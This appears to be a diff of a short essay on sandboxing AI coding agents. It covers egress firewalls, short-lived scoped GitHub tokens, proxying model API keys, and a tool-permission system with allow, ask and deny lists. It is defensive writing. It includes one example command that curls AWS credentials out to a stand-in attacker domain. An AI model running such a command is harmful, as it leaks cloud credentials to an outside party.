Dmitry Alexeenko

 Even in a Docker container, curl https://fraud.com/$(cat ~/.aws/credentials) works unless you firewall outbound.
 The Docker network is bridged by default; the world is reachable.
 The choices are roughly --network none with an explicit egress proxy for the handful of hosts you actually need (npm, GitHub, the model provider), or an egress allow-list at the firewall.

-The agent also needs to push branches, but you don't want it reading ~/.ssh.
-Issue a short-lived GitHub App token scoped to a single repository, mount it into the container, let it expire in under an hour.
-Same with model API keys: don't pass ANTHROPIC_API_KEY through to the container if you can route the calls through a server-side proxy that injects the key.
-Ambient credentials are a class of mistake; eliminate the class, don't whack-a-mole the instances.
+The agent also needs to push branches, but you don't want it anywhere near ~/.ssh.
+Issue a short-lived GitHub App token scoped to a single repo, mount it in, let it expire inside an hour.
+Same story with model keys: don't pass ANTHROPIC_API_KEY into the container if you can route the calls through a server-side proxy that injects it.
+The rule I kept coming back to: don't hand the sandbox a credential it can read at rest.

 Then there's the permission system itself.
 The first time the agent wants to run git push, ask the user; subsequent calls in the same session are allowed without prompting.
 Ants does this in packages/core/src/permissions.ts — there's an alwaysAllow list, an ask mode, and a deny list, and the executor enforces them around every tool call.